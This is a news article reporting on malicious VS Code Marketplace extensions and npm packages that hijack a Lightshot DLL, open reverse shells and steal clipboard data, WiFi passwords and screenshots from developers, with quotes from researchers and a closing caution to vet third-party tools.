Cybersecurity researchers last week found two malicious extensions in the Microsoft Visual Studio Code (VS Code) Marketplace. These malicious extensions are unfortunately purpose-built to compromise developer machines. These extensions tout themselves as a premium dark theme and an AI-powered coding assistant. Their claimed features are deeply harmful spyware that enable them to remotely download additional payloads, take screenshots of user content, and steal sensitive user data.
These extensions, dubbed “BigBlack.bitcoin-black” and “Codo AI,” take advantage of the trust developers have in legitimate tooling. Once activated, “BigBlack.bitcoin-black” runs every time you do anything in VS Code. At the same time, “Codo AI” hides obvious malicious capabilities inside a largely functional tool.
Covert Functionality and Data Theft
Both malicious extensions exploit a legitimate Lightshot binary. They use it to trick the app into loading a malicious Dynamic Link Library (DLL) via a method known as DLL hijacking. This rogue DLL, dubbed as “Lightshot.dll,” takes a vast range of data from the infected machine. It sucks up everything on your clipboard and enumerates every application you’ve ever installed. Beyond that, it records active processes, screenshots of the desktop environment, saved wifi passwords and complete system specs.
To get a sense of just how bad the threat from these extensions is, cybersecurity expert Idan Dardikman recently described the scope of the problem.
“A developer could install what looks like a harmless theme or a useful AI tool, and within seconds their WiFi passwords, clipboard contents, and browser sessions are being exfiltrated to a remote server,” – Idan Dardikman.
Dardikman further emphasized the stealthy nature of these attacks, stating, “Your code. Your emails. Your Slack DMs. Whatever’s on your screen, they’re seeing it too.”
Attack Vectors in npm Packages
Researchers have identified a pattern of 420 distinct malicious npm packages. These packages, as well as the equally malicious VS Code extensions, were all published by a suspected French speaking threat actor. These packages have a very straightforward naming convention of elf-stats-* Each of these packages includes code that can open a reverse shell and exfiltrate files to a Pipedream endpoint.
Kush Pandya, another cybersecurity specialist, pointed out the sophisticated methods used by these packages:
“Finch-rust acts as a malware loader; it contains mostly legitimate code copied from the legitimate finch package but includes a single malicious line that loads and executes the sha-rust payload,” – Kush Pandya.
This method undermines detection attempts, as finch-rust looks innocuous when studied independently. Comparatively, the real malware is located inside the sha-rust component.
Implications for Developers
The impact of these nefarious extensions and npm packages goes beyond just data exfiltration. They are worrisome threats to the health of software development environments and to the security of our nation’s cyberscape. Developers end up leaking proprietary code when they unwittingly install these extensions. Unfortunately, this threat extends to information about their projects and even their private lives.
The recent discovery of these malicious tools serves as a stark reminder for developers to stay vigilant. As always, exercise caution when installing any third-party tools or extensions! Frequent third-party security audits and more robust security protocols are absolutely necessary to protect against threats that can hide in plain sight inside benign-looking code.
“And that’s just the start. It also steals your WiFi passwords, reads your clipboard, and hijacks your browser sessions.”
The discovery of these malicious tools serves as a crucial reminder for developers to exercise caution when installing any third-party tools or extensions. Regular audits and enhanced security measures are essential to safeguard against potential threats lurking within seemingly innocuous software.